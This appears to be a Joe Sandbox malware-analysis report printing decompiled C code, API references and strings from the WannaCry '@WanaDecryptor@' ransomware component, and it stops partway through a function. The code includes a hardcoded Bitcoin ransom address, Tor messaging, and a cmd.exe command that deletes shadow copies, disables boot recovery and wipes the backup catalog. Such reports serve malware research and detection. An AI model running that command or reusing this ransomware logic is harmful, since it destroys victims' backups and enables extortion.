                                                      					 *((char*)(_t115 + 0xa8)) = 1;
                                                      					L00412D9A();
                                                      					 *((char*)(_t115 + 0xa4)) = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
                                                      					_t106 = __imp__time;
                                                      					_t45 =  *_t106(0);
                                                      					_t90 =  *0x4218a8; // 0x0
                                                      					_t116 = _t115 + 4;
                                                      					__eflags = _t45 - _t90 - 0xb4;
                                                      					if(_t45 - _t90 >= 0xb4) {
                                                      						L13:
                                                      						_t47 =  *_t106(0);
                                                      						_t91 =  *0x4218a8; // 0x0
                                                      						_t116 = _t116 + 4;
                                                      						_t48 = _t47 - _t91;
                                                      						__eflags = _t48 - 0xe10;
                                                      						if(_t48 <= 0xe10) {
                                                      							L9:
                                                      							__eflags =  *0x4218ac - 3; // 0x0
                                                      							if(__eflags < 0) {
                                                      								L15:
                                                      								 *((intOrPtr*)(_t116 + 0x14)) = 0;
                                                      								memset(_t116 + 0x18, 0, 0x21 << 2);
                                                      								_t51 = fopen("00000000.res", "rb"); // executed
                                                      								_t107 = _t51;
                                                      								_t118 = _t116 + 0x14;
                                                      								__eflags = _t107;
                                                      								if(_t107 != 0) {
                                                      									fread(_t118 + 0x1c, 0x88, 1, _t107); // executed
                                                      									fclose(_t107);
                                                      									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
                                                      									_push(0);
                                                      									_push( *((intOrPtr*)(_t118 + 0xcc)));
                                                      									_push(_t118 + 0x38);
                                                      									_push(_t111 + 0x5f0);
                                                      									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
                                                      									_t118 = _t118 + 0x30;
                                                      									_t108 = _t56;
                                                      									E0040C670();
                                                      									_t58 =  *(_t118 + 0xb0);
                                                      									__eflags = _t108;
                                                      									if(_t108 < 0) {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											_push(0);
                                                      											_push(0x30);
                                                      											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      											L00412CC8();
                                                      										}
                                                      									} else {
                                                      										__eflags = _t58;
                                                      										if(_t58 != 0) {
                                                      											L00412CC8();
                                                      											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
                                                      											_t118 = _t118 + 4;
                                                      											 *0x4218a8 = _t58;
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t108;
                                                      								} else {
                                                      									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
                                                      									L00412CC2();
                                                      									_t59 = _t51 | 0xffffffff;
                                                      								}
                                                      								L23:
                                                      								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
                                                      								return _t59;
                                                      							}
                                                      							__eflags =  *(_t116 + 0xb0);
                                                      							if( *(_t116 + 0xb0) != 0) {
                                                      								L00412DA6();
                                                      								 *((char*)(_t116 + 0xa8)) = 2;
                                                      								_t60 =  *_t106(0);
                                                      								_t104 =  *0x4218a8; // 0x0
                                                      								_t120 = _t116 + 4;
                                                      								__eflags = 0x3d;
                                                      								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
                                                      								_push("You are sending too many mails! Please try again %d minutes later.");
                                                      								_push(_t120 + 0x10);
                                                      								L00412E00();
                                                      								_t48 =  *(_t120 + 0x1c);
                                                      								_t116 = _t120 + 0xc;
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(_t48);
                                                      								L00412CC8();
                                                      								 *((char*)(_t116 + 0xa4)) = 0;
                                                      								L00412CC2();
                                                      							}
                                                      							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
                                                      							L00412CC2();
                                                      							_t59 = _t48 | 0xffffffff;
                                                      							goto L23;
                                                      						}
                                                      						 *0x4218ac = 0;
                                                      						goto L15;
                                                      					}
                                                      					_t65 =  *0x4218ac; // 0x0
                                                      					__eflags = _t65 - 3;
                                                      					if(_t65 >= 3) {
                                                      						goto L13;
                                                      					}
                                                      					_t48 = _t65 + 1;
                                                      					__eflags = _t48;
                                                      					 *0x4218ac = _t48;
                                                      					goto L9;
                                                      				}
                                                      				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push("Too short message!");
                                                      					L00412CC8();
                                                      				}
                                                      				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				_t59 = _t44 | 0xffffffff;
                                                      				goto L23;
                                                      			}


                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      • s.wnry, xrefs: 004084DD
                                                      • Too short message!, xrefs: 0040834F
                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • 00000000.res, xrefs: 00408480
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
                                                      				char _v1032;
                                                      				char _v1424;
                                                      				void _v2256;
                                                      				void _v2456;
                                                      				void _v2707;
                                                      				char _v2708;
                                                      				intOrPtr _v2720;
                                                      				short _v2724;
                                                      				int _t48;
                                                      				int _t49;
                                                      				intOrPtr* _t50;
                                                      				intOrPtr _t60;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t66;
                                                      				short _t70;
                                                      				void* _t82;
                                                      				char* _t87;
                                                      				char* _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t98;
                                                      				intOrPtr _t99;
                                                      				intOrPtr _t100;
                                                      				intOrPtr _t105;
                                                      				char _t122;
                                                      				intOrPtr _t134;
                                                      				intOrPtr _t135;
                                                      				intOrPtr _t136;
                                                      				intOrPtr* _t140;
                                                      				intOrPtr* _t141;
                                                      				intOrPtr* _t142;
                                                      				intOrPtr* _t161;
                                                      				intOrPtr* _t162;
                                                      				intOrPtr* _t163;
                                                      				void* _t165;
                                                      				void* _t167;
                                                      				intOrPtr* _t168;
                                                      				void* _t169;
                                                      				void* _t170;
                                                      				void* _t171;
                                                      				void* _t201;
                                                      
                                                      				_t201 = __fp0;
                                                      				_t90 = __ecx; // executed
                                                      				L00412CB0(); // executed
                                                      				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                                      				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                                      				_t48 = E00401C70(0);
                                                      				_t170 = _t169 + 4;
                                                      				if(_t48 == 0) {
                                                      					_t122 =  *0x421798; // 0x0
                                                      					_v2708 = _t122;
                                                      					memset( &_v2707, _t48, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetModuleFileNameA(0,  &_v2708, 0x104);
                                                      					_t87 = strrchr( &_v2708, 0x5c);
                                                      					_t170 = _t170 + 0x14;
                                                      					if(_t87 != 0) {
                                                      						_t89 = strrchr( &_v2708, 0x5c);
                                                      						_t170 = _t170 + 8;
                                                      						 *_t89 = 0;
                                                      					}
                                                      					SetCurrentDirectoryA( &_v2708);
                                                      				}
                                                      				_t167 = _t90 + 0x50c;
                                                      				_t49 = E00401A10(_t167, 1);
                                                      				_t171 = _t170 + 8;
                                                      				if(_t49 == 0) {
                                                      					memset(_t167, _t49, 0xc3 << 2);
                                                      					asm("repne scasb");
                                                      					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                                      					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                                      					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                                      					 *(_t90 + 0x588) = 0;
                                                      					__imp__time(0);
                                                      					 *(_t90 + 0x578) = _t82;
                                                      					E00401A10(_t167, 0);
                                                      					_t171 = _t171 + 0x30;
                                                      				}
                                                      				_t50 = E00402C40();
                                                      				__imp__#115(0x202,  &_v1424); // executed
                                                      				__imp____p___argc();
                                                      				if( *_t50 > 1) {
                                                      					_t168 = __imp____p___argv;
                                                      					_t140 = "fi";
                                                      					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      					while(1) {
                                                      						_t98 =  *_t161;
                                                      						_t60 = _t98;
                                                      						if(_t98 !=  *_t140) {
                                                      							break;
                                                      						}
                                                      						if(_t60 == 0) {
                                                      							L12:
                                                      							_t60 = 0;
                                                      						} else {
                                                      							_t136 =  *((intOrPtr*)(_t161 + 1));
                                                      							_t22 = _t140 + 1; // 0x31000069
                                                      							_t60 = _t136;
                                                      							if(_t136 !=  *_t22) {
                                                      								break;
                                                      							} else {
                                                      								_t161 = _t161 + 2;
                                                      								_t140 = _t140 + 2;
                                                      								if(_t60 != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						}
                                                      						L14:
                                                      						if(_t60 == 0) {
                                                      							E00407F80(_t90);
                                                      							ExitProcess(0);
                                                      						}
                                                      						_t141 = "co";
                                                      						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      						while(1) {
                                                      							_t99 =  *_t162;
                                                      							_t63 = _t99;
                                                      							if(_t99 !=  *_t141) {
                                                      								break;
                                                      							}
                                                      							if(_t63 == 0) {
                                                      								L21:
                                                      								_t63 = 0;
                                                      							} else {
                                                      								_t135 =  *((intOrPtr*)(_t162 + 1));
                                                      								_t25 = _t141 + 1; // 0x6600006f
                                                      								_t63 = _t135;
                                                      								if(_t135 !=  *_t25) {
                                                      									break;
                                                      								} else {
                                                      									_t162 = _t162 + 2;
                                                      									_t141 = _t141 + 2;
                                                      									if(_t63 != 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L21;
                                                      									}
                                                      								}
                                                      							}
                                                      							L23:
                                                      							if(_t63 == 0) {
                                                      								E004080C0(_t90);
                                                      								ExitProcess(0);
                                                      							}
                                                      							_t142 = "vs";
                                                      							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      							while(1) {
                                                      								_t100 =  *_t163;
                                                      								_t66 = _t100;
                                                      								if(_t100 !=  *_t142) {
                                                      									break;
                                                      								}
                                                      								if(_t66 == 0) {
                                                      									L30:
                                                      									_t66 = 0;
                                                      								} else {
                                                      									_t134 =  *((intOrPtr*)(_t163 + 1));
                                                      									_t28 = _t142 + 1; // 0x63000073
                                                      									_t66 = _t134;
                                                      									if(_t134 !=  *_t28) {
                                                      										break;
                                                      									} else {
                                                      										_t163 = _t163 + 2;
                                                      										_t142 = _t142 + 2;
                                                      										if(_t66 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L30;
                                                      										}
                                                      									}
                                                      								}
                                                      								L32:
                                                      								if(_t66 == 0) {
                                                      									Sleep(0x2710);
                                                      									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                                      									_t70 = "cmd.exe"; // 0x2e646d63
                                                      									_t105 =  *0x420fd4; // 0x657865
                                                      									_v2724 = _t70;
                                                      									_v2720 = _t105;
                                                      									if(E00401BB0() != 0) {
                                                      										_push( &_v2456);
                                                      										_push( &_v2724);
                                                      										sprintf( &_v1032, "%s %s");
                                                      										E00401A90( &_v1032, 0, 0);
                                                      									} else {
                                                      										E00401B50( &_v2724,  &_v2456, _t71);
                                                      									}
                                                      									ExitProcess(0);
                                                      								}
                                                      								goto L37;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L32;
                                                      						}
                                                      						asm("sbb eax, eax");
                                                      						asm("sbb eax, 0xffffffff");
                                                      						goto L23;
                                                      					}
                                                      					asm("sbb eax, eax");
                                                      					asm("sbb eax, 0xffffffff");
                                                      					goto L14;
                                                      				}
                                                      				L37:
                                                      				E00407E80();
                                                      				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
                                                      				E00406F80(_t90, _t201);
                                                      				E00406C20(_t90);
                                                      				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
                                                      				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
                                                      				 *0x42189c = _t90;
                                                      				return 1;
                                                      			}











































                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNEL32(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • %s %s, xrefs: 00406764
                                                      • cmd.exe, xrefs: 0040671C
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v44;
                                                      				struct HINSTANCE__* _t82;
                                                      				struct HICON__* _t83;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t124;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E0B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t124;
                                                      				_push(__ecx);
                                                      				_t119 = __ecx;
                                                      				_push(_a4);
                                                      				_push(0x66);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                                      				_v12 = 2;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                                      				_v12 = 3;
                                                      				E004085C0(__ecx + 0x120);
                                                      				_v12 = 4;
                                                      				E004085C0(__ecx + 0x1a4);
                                                      				_v12 = 5;
                                                      				E00404090(__ecx + 0x228);
                                                      				_v12 = 6;
                                                      				E00404090(__ecx + 0x290);
                                                      				_v12 = 7;
                                                      				E00404090(__ecx + 0x2f8);
                                                      				_v12 = 8;
                                                      				E00404090(__ecx + 0x360);
                                                      				_v12 = 9;
                                                      				E00405000(__ecx + 0x3c8);
                                                      				_v12 = 0xa;
                                                      				E00405000(__ecx + 0x444);
                                                      				_v12 = 0xb;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                                      				_v12 = 0xc;
                                                      				L00412DA6();
                                                      				_v12 = 0xd;
                                                      				L00412DA6();
                                                      				_v12 = 0xe;
                                                      				L00412DA6();
                                                      				_v12 = 0xf;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                                      				_v12 = 0x1b;
                                                      				_t82 = E00407640(__ecx + 0x888);
                                                      				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 0x1d;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				L00412E5A();
                                                      				_push(0x80);
                                                      				_push(0xe);
                                                      				L00412F2C();
                                                      				_t83 = LoadIconA(_t82, 0x80); // executed
                                                      				_push(0x421798);
                                                      				 *(_t119 + 0x82c) = _t83;
                                                      				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                                      				L00412DA0();
                                                      				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                                      				 *[fs:0x0] = _v44;
                                                      				return _t119;
                                                      			}











                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v1039;
                                                      				char _v1040;
                                                      				struct _STARTUPINFOA _v1108;
                                                      				struct _PROCESS_INFORMATION _v1124;
                                                      				char _t29;
                                                      				long _t33;
                                                      				int _t37;
                                                      				void* _t46;
                                                      				char _t47;
                                                      				long _t51;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      				void* _t84;
                                                      				void* _t86;
                                                      
                                                      				_t29 =  *0x421798; // 0x0
                                                      				_v1040 = _t29;
                                                      				memset( &_v1039, 0, 0x81 << 2);
                                                      				asm("stosw");
